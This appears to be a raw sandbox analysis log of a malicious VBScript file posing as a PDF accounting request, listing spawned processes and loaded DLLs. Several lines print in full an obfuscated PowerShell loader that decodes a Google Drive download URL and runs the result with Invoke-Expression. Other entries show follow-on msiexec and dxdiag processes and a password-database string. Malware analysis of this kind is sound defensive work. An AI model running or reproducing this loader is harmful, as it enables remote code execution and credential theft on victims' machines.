Source: dxdiag.exe, 00000012.00000003.2460155696.0000000021905000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe ReversingLabs: Detection: 15%
Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe Virustotal: Detection: 12%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
